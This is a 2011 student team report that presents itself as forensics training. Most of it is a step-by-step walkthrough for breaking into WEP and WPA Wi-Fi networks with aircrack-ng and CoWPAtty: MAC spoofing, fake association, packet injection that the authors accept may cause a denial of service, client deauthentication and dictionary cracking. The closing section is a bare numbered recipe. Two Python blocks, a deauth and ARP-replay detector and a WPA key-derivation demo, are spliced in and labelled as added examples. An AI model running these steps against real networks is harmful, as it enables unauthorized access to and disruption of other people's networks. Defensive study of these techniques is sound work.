Final Video Team Project


Team Epsilon


April 13, 2011

Team Members: Ian Levy, Anthony Kuny, Jennifer Strawn, Jordan Godfrey, Mary Viloria


Table of Contents

I. Introduction

II. Written Instructions

A. Cracking WEP

B. Cracking WPA

C. CoWPAtty

III. Step-by-step Instructions

A. Cracking WEP

B. Cracking WPA

C. Cracking WPA with CoWPAtty

I. Introduction

Wireless cracking is the part of penetration testing that gains access to wireless networks. Criminals usually gain access without authorization or through social engineering. For computer and cyber forensics, this applies to criminals using password cracking and possibly altering important files.

We will set up a scenario where a criminal has a WEP/WPA/WPA2 network in range and is attempting to gain unauthorized access to it. We will do this using BackTrack 4 R2, an operating system designed for penetration testers that can easily be installed to run from a USB drive. Pre-installed in BackTrack is a program suite called aircrack-ng that is used for password cracking using packet injection, dictionary and brute-force attacks. Through this we will show detailed steps on how weak encryption standards can easily be cracked. We will also show how strong encryption standards can easily be cracked when weak passwords are used. For cracking WEP we will use packet injection to increase the number of initialization vectors exchanged between the host and the router. By doing this we will be able to obtain the wireless key in hex form, which can be entered instead of the actual text password to gain access. For WPA/WPA2 we will obtain a handshake from the router that can be used by offline password-cracking programs to attempt either a brute-force attack or a dictionary attack to find the password. This method requires the actual text of the password. There are plenty of offline password-cracking programs available, but as a group we will focus on the aircrack-ng suite and CoWPAtty.

This fits into cyber forensics because wireless cracking can be done by criminals trying to gain access to networks from which they want to obtain information. In cyber forensics, our job is to retrace their steps and gather the information and data that show how these criminals gained access to the networks, and to try to establish the reasoning behind their actions. We will use cyber forensics to collect, preserve and present this data as you would in a legal setting.

The reason this is important from this perspective is first to demonstrate how the cracking is accomplished, but overall it is useful to any person who intends to investigate network security. Not only should the steps for successfully gaining access to wireless networks be known, we also believe it is useful to learn how to keep computer information private and secure. The first step is to make sure a firewall is installed and working correctly, with automatic updates enabled so that the computer is always current. Next, it is important to ensure the firewall settings match how the computer is used. Lastly, it is imperative to have strong, substantial passwords so that the network as well as the individual computer is protected to the best of the user's ability. To test these changes to the network, the first step is to look for leaks by running a leak test using a free online tool, for example the Gibson Research Corporation's LeakTest. Understanding these steps and the ways to prevent wireless encryption cracking is just as important, because it protects any computer and is essential for keeping privacy and confidentiality.

II. Written Instructions

In cyber forensics, understanding how to break into networks is extremely important. It is essential for the analyst because it allows them to interpret the router logs and see that there was an increase in packets, possibly indicating an attack either to perform a denial of service or to increase initialization vectors in order to crack WEP encryption. This video documentation will help explain why this is important and will walk through each command and its purpose throughout cracking WEP and WPA encryption.

A. Cracking WEP

First, in order to crack WEP (Wired Equivalent Privacy), we need to do some housekeeping. We will boot into BackTrack, which is a Linux-based operating system, and then launch Konsole, which opens the command line in BackTrack. We will use the aircrack-ng suite to break into a WEP-encrypted network. Within Konsole we will find out which devices are available to us.

In order to do this we will use the command airmon-ng. As you can see we have a couple of devices, wlan0 and wlan1; we will use wlan0. The next task is to put the wireless card in monitor mode and spoof the MAC address to make it easier for later commands. In order to change the MAC address we first need to put the interface down. We will do this with the command ifconfig wlan0 down. ifconfig is the command, wlan0 is the interface and down is the option that brings the interface down. Then we will change the MAC address with the command macchanger --mac 00:11:22:33:44:55 wlan0. macchanger is the command, --mac is the option, the MAC address is the new desired MAC address and wlan0 is the interface to apply the change to.

Now we will put the card in monitor mode with the command airmon-ng start wlan0. airmon-ng is the command, wlan0 is the interface and start is the option that starts monitor mode on the interface. As you can see, airmon-ng creates another interface named mon0. This is because of the drivers used to make this specific wireless card compatible with the aircrack-ng suite that is preinstalled when BackTrack is booted. Now we will scan for any vulnerable WEP-encrypted networks. We can do this with the command airodump-ng mon0. airodump-ng is the command, and we are telling it to use mon0, the new interface we created, to scan all channels and see whether any networks are in range. As you can see, all the networks in range appear as the wireless card scans the channels. To stop the scan, press Ctrl+C. Now that we have found a vulnerable network, we are going to sniff and capture the traffic at the access point. We will do this with airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface). -c is the channel the vulnerable network is broadcasting on, -w is the name you want to give the .cap file for cracking later, and --bssid is the MAC address of the vulnerable network. mon0 is the interface we are using to sniff the packets. Now we can see whether any clients are connected to the vulnerable network and collect the data being sent between the connected clients.

Next we fake-associate our interface with the access point of the vulnerable network. First we open another tab within the Konsole window. We then send the fake association packets using the aireplay-ng command: aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 mon0, where -1 0 is the fake association option, -a is the BSSID of the access point, -h is the MAC address we changed our interface to, and mon0 is our interface. As you can see we were successful: Konsole prints the message "Association successful :-)". With that confirmation we can perform packet injection against the vulnerable network. We could wait and not make our presence known to any connected clients, but we don't have time to wait. Packet injection could potentially cause a denial of service, because we are sending so many packets to increase the data we are trying to capture. This usually takes only a few minutes and shouldn't be too disruptive. Now for the actual command that makes this happen. We use the aireplay-ng command again: aireplay-ng -3 -b (the MAC address of the vulnerable access point) -h 00:11:22:33:44:55 mon0, where -3 is the option that sends the fake packets, -b is the BSSID, -h is our spoofed MAC address and mon0 is our interface. With this command we generate network traffic to speed up the crack. When we switch back to the previous tab where we are sniffing the network, we can see the data column increase rapidly.

Now that we have confirmed that packets are being injected, we open another tab to crack the vulnerable network. In the new tab we start cracking with the aircrack-ng command: aircrack-ng -b (MAC address of the vulnerable access point) filename-01.cap, where filename-01.cap is the capture file created with the -w option. As you can see, aircrack-ng is brute forcing to find the network key of the vulnerable network. When it finds the key, it prints KEY FOUND with the key in hexadecimal form. You can connect to the vulnerable network by dropping the colons and entering the key as the network key.

B. Cracking WPA

WPA stands for Wi-Fi Protected Access. We will perform similar commands to those we used to crack WEP, but instead of aircrack-ng brute forcing by itself, we need to test the password with a dictionary attack. A dictionary attack uses a text file compiled of all the possible network keys that you think might be the password. In some cases a dictionary attack may only use words found in a dictionary, but that is considered a weak word list. We will use the aircrack-ng suite to break into a WPA-encrypted network.

Within Konsole we find out which devices are available to us with the command airmon-ng. As you can see we have a couple of devices, wlan0 and wlan1; we will use wlan0. The next task is to put the wireless card in monitor mode and spoof the MAC address to make it easier for later commands. In order to change the MAC address we first need to put the interface down with the command ifconfig wlan0 down: ifconfig is the command, wlan0 is the interface and down is the option that brings the interface down. Then we change the MAC address with macchanger --mac 00:11:22:33:44:55 wlan0: macchanger is the command, --mac is the option, the MAC address is the new desired MAC address and wlan0 is the interface to apply the change to. Now we put the card in monitor mode with airmon-ng start wlan0: airmon-ng is the command, wlan0 is the interface and start is the option that starts monitor mode on the interface. As you can see, airmon-ng creates another interface named mon0. This is because of the drivers used to make this specific wireless card compatible with the aircrack-ng suite that is preinstalled when BackTrack is booted. Now we scan for any WPA-encrypted networks with the command airodump-ng mon0.

airodump-ng is the command, and we are telling it to use mon0, the new interface we created, to scan all channels and see whether any networks are in range. As you can see, all the networks in range appear as the wireless card scans the channels. To stop the scan, press Ctrl+C. Now that we have found a WPA network, we are going to sniff and capture the traffic at the access point. We do this with airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface). -c is the channel the network is broadcasting on, -w is the name you want to give the .cap file for cracking later, and --bssid is the MAC address of the target network. mon0 is the interface we are using to sniff the packets. Now we can see whether any clients are connected to the network and collect the data being sent between the connected clients. Next we need a connected client that we can force to re-authenticate so that we can capture the handshake. Once we have captured the handshake we can perform the crack offline. We open a text editor, copy down the connected client's MAC address and use it in our next command. Now we open another tab and use the command aireplay-ng -0 1 -a (MAC address of the access point) -c (MAC address of the connected client). The -0 option is the deauthentication command and the number that follows is how many packets to send.

Once you have entered the command, switch back to the first tab and you will notice in the top right-hand corner that we have captured the four-way handshake. Now we stop sniffing the network by pressing Ctrl+C. Then we use the aircrack-ng command to run through a wordlist to crack the password. We enter aircrack-ng -w (file location of the wordlist) -b (MAC address of the access point we are attempting to gain access to) followed by the file location of the captured four-way handshake. aircrack-ng then runs through the wordlist and tries to crack the WPA password. As you can see we are successful, and the password is "password".
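The analyst's view described at the start of these instructions is the other side of both procedures above: the aireplay-ng -3 injection in section A appears in a monitor log as a burst of ARP replies from one source, and the aireplay-ng -0 deauthentication in section B as a burst of deauth frames aimed at a client. The Python below is an added example, not part of this report or of the aircrack-ng suite; it assumes a constructed log format of "seconds type source destination bssid" and illustrative thresholds, and raises one alert per source MAC whose count inside a sliding window reaches the limit.

```python
from collections import defaultdict, deque

# Thresholds are assumed values for this illustration; tune them per environment.
WINDOW_SEC = 10     # sliding window in seconds
DEAUTH_LIMIT = 5    # deauth frames from one source MAC per window
ARP_LIMIT = 100     # ARP replies from one source MAC per window

# Alert text per frame type, matching the two techniques in the report.
LABELS = {
    "deauth": "deauth burst: client forced to re-authenticate (WPA handshake capture)",
    "arp-reply": "ARP replay burst: injected traffic inflating WEP initialization vectors",
}

def parse_line(line):
    """Parse one line of the constructed log format '<sec> <type> <src> <dst> <bssid>'."""
    parts = line.split()
    if len(parts) != 5 or not parts[0].isdigit():
        return None
    return {"t": int(parts[0]), "type": parts[1], "src": parts[2].lower(),
            "dst": parts[3].lower(), "bssid": parts[4].lower()}

def detect(lines):
    """Return [(time, src_mac, alert)], one alert per (type, source) that hits its limit."""
    windows = defaultdict(deque)   # (type, src) -> timestamps still inside the window
    alerted, alerts = set(), []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["type"] not in LABELS:
            continue
        key = (rec["type"], rec["src"])
        q = windows[key]
        q.append(rec["t"])
        while rec["t"] - q[0] > WINDOW_SEC:   # drop timestamps that aged out of the window
            q.popleft()
        limit = DEAUTH_LIMIT if rec["type"] == "deauth" else ARP_LIMIT
        if len(q) >= limit and key not in alerted:
            alerted.add(key)
            alerts.append((rec["t"], rec["src"], LABELS[rec["type"]]))
    return alerts

def constructed_log():
    """Constructed sample: benign client traffic, six deauth frames at t=20 and 150 ARP
    replies from t=30 on, the bursts coming from the spoofed MAC used in the report."""
    spoofed, ap, client = "00:11:22:33:44:55", "00:aa:bb:cc:dd:ee", "00:1a:2b:3c:4d:5e"
    log = [f"{t} data {client} {ap} {ap}" for t in range(0, 60, 3)]
    log += [f"{t} arp-reply {client} ff:ff:ff:ff:ff:ff {ap}" for t in (0, 20, 40)]
    log += [f"20 deauth {spoofed} {client} {ap}" for _ in range(6)]
    log += [f"{30 + i // 20} arp-reply {spoofed} ff:ff:ff:ff:ff:ff {ap}" for i in range(150)]
    return sorted(log, key=lambda s: int(s.split()[0]))
```

Running detect(constructed_log()) yields two alerts, the deauth burst at t=20 and the ARP replay burst once its 100th reply arrives at t=34, while the client's occasional ARP replies stay below the limit.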

C. CoWPAtty

Now we are going to use CoWPAtty, an alternative method of WPA cracking. We type cowpatty followed by -r, the capture file containing the four-way handshake, and -f, the file location of the word list you want to use for cracking the password. Then -s is the SSID of the network you are trying to access; at the end, press Enter. CoWPAtty runs through the word list and tries to find the password; as you can see, it successfully found the word "password".
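Both aircrack-ng in section B and CoWPAtty here succeed only because "password" is in the word list: WPA/WPA2-PSK derives the pairwise master key from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations), so every word list entry costs one such derivation and nothing is recovered unless the exact text is guessed. The Python below is an added illustration, not code from this report or from either tool; it checks the derivation against the IEEE 802.11i test vector, shows that the SSID acts as the salt, and estimates how long candidate sets of different sizes take at the rate measured on the host (an assumed single-threaded figure, so real crackers are much faster). The SSID "linksys" used in the salt comparison is a sample value.

```python
import hashlib
import time

# IEEE 802.11i Annex H.4 test vector: passphrase "password", SSID "IEEE".
IEEE_VECTOR = bytes.fromhex(
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1 with the
    SSID as salt and 4096 iterations. A word list attack must redo this per candidate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def measure_rate(ssid: str, samples: int = 20) -> float:
    """Derivations per second on this host (assumed single-threaded Python; tools are faster)."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(f"sample-{i}", ssid)
    return samples / (time.perf_counter() - start)

def keyspace(charset_size: int, length: int) -> int:
    """Number of candidates for a random passphrase of the given length and alphabet."""
    return charset_size ** length

def exposure(rate: float) -> dict:
    """Worst-case seconds to exhaust several candidate sets at the given rate."""
    return {
        "1M-word list": 1_000_000 / rate,
        "8 lowercase letters": keyspace(26, 8) / rate,
        "12 random printable": keyspace(95, 12) / rate,
    }

def ssid_changes_key(passphrase: str) -> bool:
    """The SSID is the salt, so a precomputed PMK table only applies to one SSID."""
    return wpa_pmk(passphrase, "IEEE") != wpa_pmk(passphrase, "linksys")

if __name__ == "__main__":
    assert wpa_pmk("password", "IEEE") == IEEE_VECTOR
    rate = measure_rate("IEEE")
    for name, secs in exposure(rate).items():
        print(f"{name:>20}: {secs:.3g} s at {rate:.0f} guesses/s")
```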

III. Step-by-step Instructions

A. Cracking WEP

*Press Enter after every step except 6 and 8

Step 1: Type airmon-ng

Step 2: Type ifconfig wlan0 down

Step 3: Type macchanger --mac 00:11:22:33:44:55 wlan0

Step 4: Type airmon-ng start wlan0

Step 5: Type airodump-ng mon0

Step 6: To stop the scan you will want to hit Ctrl+C.

Step 7: Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Step 8: Open another tab with the console

Step 9: Type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 mon0

Step 10: Once you see this screen, you have successfully associated with the access point.

Step 11: Type aireplay-ng -3 -b (MAC address of the vulnerable access point) -h 00:11:22:33:44:55 mon0

Step 12: Type aircrack-ng -b (MAC address of the vulnerable access point) filename-01.cap, where filename-01.cap is the capture file created with the -w option. When the command finds the network key, it prints KEY FOUND with the key in hexadecimal form.

Step 13: You will be able to connect to the vulnerable network by dropping the colons and entering it into the network key.

B. Cracking WPA

*Press Enter after every step except 6 and 8

Step 1: Type airmon-ng

Step 2: Type ifconfig wlan0 down

Step 3: Type macchanger --mac 00:11:22:33:44:55 wlan0

Step 4: Type airmon-ng start wlan0

Step 5: Type airodump-ng mon0

Step 6: To stop the scan you will want to hit Ctrl+C.

Step 7: Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Step 8: Open another tab with the console

Step 9: Type aireplay-ng -0 1 -a (MAC address of the access point) -c (MAC address of the connected client). The -0 option is the deauthentication command and the number that follows is how many packets to send.

Step 10: Type aircrack-ng -w (file location of the wordlist) -b (MAC address of the access point we are attempting to gain access to) followed by the file location of the captured four-way handshake.

Step 11: If the password is in the chosen word list, aircrack-ng will return the password. If not, it will say "Password not in dictionary" and you will need to try another list.

C. Cracking WPA with CoWPAtty

Note: This is used after you have captured the four-way handshake.

Step 1: Type cowpatty -r (captured four-way handshake) -f (file location of the word list) -s (network SSID)

Step 2: CoWPAtty will return the password if it is in the dictionary provided; if not, it will state that the password was not in the dictionary file and suggest expanding your list.
